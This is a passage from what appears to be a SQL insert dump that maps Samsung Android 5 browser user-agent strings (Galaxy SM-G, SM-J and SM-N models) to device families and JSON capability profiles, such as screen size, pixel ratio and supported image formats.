Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G530FZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G530H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G530M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G530P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G530T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G531BT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G531F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G531F-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G531H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G531M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G5500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G600FY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G800F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G800H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G850F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G850FQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G870F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G900A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G900F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G900FQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G900H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G900M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G900T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G903F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G903M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G925A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G925F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G928C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J105B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J105H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J105M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J110M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J111F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J111M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J120F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J120FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J120G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J120H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J120M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J120ZN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J200BT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J200F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J200G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J200H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J200M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J3110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J320F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J320FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J320FN-ORANGE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J320G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J320H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J320M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J320P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J320ZN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J5007) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J500F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J500FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J500G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J500H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J500M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J5108) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J700F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J700H) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J700M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-J7108) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N7505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N9000Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N9005) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N900T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N900V 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N900V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N910C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_n','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-N910F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 